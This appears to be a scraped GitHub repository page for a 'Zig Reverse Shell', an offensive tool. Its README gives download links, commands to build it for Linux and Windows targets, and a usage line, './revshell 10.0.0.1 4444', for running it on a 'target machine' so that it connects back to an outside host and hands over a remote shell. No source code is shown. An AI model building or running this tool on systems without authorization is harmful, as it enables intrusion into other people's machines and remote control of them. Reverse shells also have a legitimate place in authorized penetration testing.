Skip to content
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Zig Reverse Shell

Download

Get the binary for your target platform.

Linux: Download
Windows: Download


Build from Source

Clone the repository and build for your target platform:

# Linux target
zig build -Dtarget=x86_64-linux

# Windows target
zig build -Dtarget=x86_64-windows

After that, the executable is generated under zig-out/bin directory.


Usage

Execute the binary in your target machine:

./revshell 10.0.0.1 4444

About

Zig Reverse Shell

Resources

Stars

0 stars

Watchers

0 watching

Forks

Releases

Packages

Contributors

Languages